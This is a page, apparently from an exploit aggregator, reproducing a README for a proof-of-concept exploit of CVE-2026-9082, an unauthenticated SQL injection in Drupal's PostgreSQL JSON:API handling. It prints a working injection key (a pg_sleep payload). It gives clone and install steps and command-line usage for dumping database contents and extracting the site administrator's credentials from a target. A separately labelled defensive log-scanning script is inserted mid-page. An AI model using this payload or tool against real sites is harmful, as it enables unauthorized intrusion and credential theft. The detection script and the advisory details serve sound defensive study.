## https://sploitus.com/exploit?id=89259320-7066-518A-B075-CE8CD77E926F
CVE-2026-9082: Drupal Core PostgreSQL SQL Injection PoC
Overview
This repository provides an ethical Proof-of-Concept (PoC) for
CVE-2026-9082, a Highly Critical SQL injection
vulnerability in Drupal Core affecting all PostgreSQL-backed
sites running Drupal 8.0 through 11.3.9.
The flaw resides in the PostgreSQL Entity Query Condition handler and can be
exploited by anonymous (unauthenticated) users through the
JSON:API module, which is enabled by default since Drupal 9.
Official advisory:
SA-CORE-2026-004
Vulnerability Summary
Drupal Core includes a database abstraction API designed to sanitize queries
and prevent SQL injection. A flaw in the PostgreSQL-specific Entity Query
Condition class (core/modules/pgsql/src/EntityQuery/Condition.php)
allows an attacker to inject arbitrary SQL through user-controlled
array keys passed via JSON:API filter parameters.
CVE ID: CVE-2026-9082
Advisory: SA-CORE-2026-004
Affected Software: Drupal Core
Affected Versions: 8.0.0 through 11.3.9 (PostgreSQL backend only)
Fixed in: 11.3.10, 11.2.12, 10.6.9, 10.5.10
Severity: Highly Critical (20/25 on the Drupal risk scale)
Authentication: None required (anonymous)
Impact: Data exfiltration, privilege escalation, RCE in some configurations
Attack vector: HTTP, via JSON:API filter condition array keys
How it works
The translateCondition() method in the PostgreSQL Condition
class iterates over $condition['value'] and uses the
array keys to construct PDO placeholder names:
$where_id = $where_prefix . $key;
JSON:API allows anonymous users to supply filter values with
arbitrary array keys via URL parameters:
filter[x][condition][value][MALICIOUS_KEY]=val
PDO named placeholders consist only of [a-zA-Z0-9_]
characters. When the key contains ), PDO stops parsing the
placeholder name at that character; everything after it becomes literal SQL
injected into the query.
By sending a key like 1))/**/OR/**/(SELECT pg_sleep(5)) IS NOT NULL)--,
the attacker closes the IN() clause and appends arbitrary SQL,
while the binding for :prefix_1 is satisfied by a legitimate
key 1 in the same request.
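A defender-side check built from the mechanism described above, added here as an example and not part of this repository's code: because a PDO placeholder can only contain [A-Za-z0-9_], any JSON:API filter value key outside that alphabet is anomalous and worth alerting on. The access-log format and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# PDO named placeholders are limited to [A-Za-z0-9_]. The affected code builds the
# placeholder name from the user-supplied array key, so a key outside that alphabet
# can never be a well-formed placeholder and is worth flagging.
PLACEHOLDER_KEY = re.compile(r"^[A-Za-z0-9_]+$")
# filter[<name>][condition][value][<key>]  ->  captures <key>
VALUE_KEY = re.compile(r"^filter\[[^\]]*\]\[condition\]\[value\]\[(.*)\]$", re.DOTALL)
# Request target in a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PATCH) (\S+) HTTP/')

def suspicious_value_keys(request_target):
    """Filter value keys in one request target that fall outside the placeholder
    alphabet; percent-encoding is decoded first, so %29 counts the same as ')'."""
    flagged = []
    for name, _ in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        m = VALUE_KEY.match(name)
        if m and not PLACEHOLDER_KEY.match(m.group(1)):
            flagged.append(m.group(1))
    return flagged

def scan_access_log(lines):
    """Return (client_ip, offending_keys) for each line carrying a flagged key."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        keys = suspicious_value_keys(m.group(1)) if m else []
        if keys:
            hits.append((line.split(" ", 1)[0], keys))
    return hits

# Constructed sample log lines (not real traffic): a normal IN filter, the same
# filter with a percent-encoded ')' in a value key, and a plain scalar filter.
SAMPLE_LOG = [
    '203.0.113.10 - - [01/Jan/2026:10:00:00 +0000] "GET /jsonapi/node/article'
    '?filter[a][condition][path]=title&filter[a][condition][operator]=IN'
    '&filter[a][condition][value][0]=foo&filter[a][condition][value][1]=bar HTTP/1.1" 200 512',
    '203.0.113.11 - - [01/Jan/2026:10:00:05 +0000] "GET /jsonapi/node/article'
    '?filter[a][condition][path]=title&filter[a][condition][operator]=IN'
    '&filter[a][condition][value][1]=x&filter[a][condition][value][1%29]=x HTTP/1.1" 200 512',
    '203.0.113.12 - - [01/Jan/2026:10:00:09 +0000] "GET /jsonapi/node/article'
    '?filter[a][condition][path]=title&filter[a][condition][value]=hello HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, keys in scan_access_log(SAMPLE_LOG):
        print(f"{ip}: filter value keys outside [A-Za-z0-9_]: {keys}")
```

The same key check, applied before the placeholder name is assembled, is the shape of the server-side fix: reject or re-index any value key that does not match the placeholder alphabet.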
References & Credit
Advisory: SA-CORE-2026-004
Patch commit: ea9524d9
Discoverer: michaelmaturi (credited in the advisory)
Legal Notice
This tool is intended for authorized security testing, educational
purposes, and ethical research only. Unauthorized access to computer systems
is illegal.
Installation
git clone https://github.com/7h30th3r0n3/CVE-2026-9082-Drupal-PoC.git
cd CVE-2026-9082-Drupal-PoC
pip install requests rich
Usage (CLI)
# Check if target is vulnerable
python3 CVE-2026-9082.py -u https://target.com --check
# Extract PostgreSQL version
python3 CVE-2026-9082.py -u https://target.com --version
# Extract database info (user + db name)
python3 CVE-2026-9082.py -u https://target.com --dbinfo
# Extract Drupal admin credentials (uid=1)
python3 CVE-2026-9082.py -u https://target.com --admin
# List database tables
python3 CVE-2026-9082.py -u https://target.com --tables
# Custom SQL query extraction
python3 CVE-2026-9082.py -u https://target.com --query "SELECT current_user"
# Use boolean-based extraction (faster but less reliable)
python3 CVE-2026-9082.py -u https://target.com --version -m bool
# Interactive mode (no arguments)
python3 CVE-2026-9082.py
Author
PoC developed by 7h30th3r0n3
Vulnerability discovered by michaelmaturi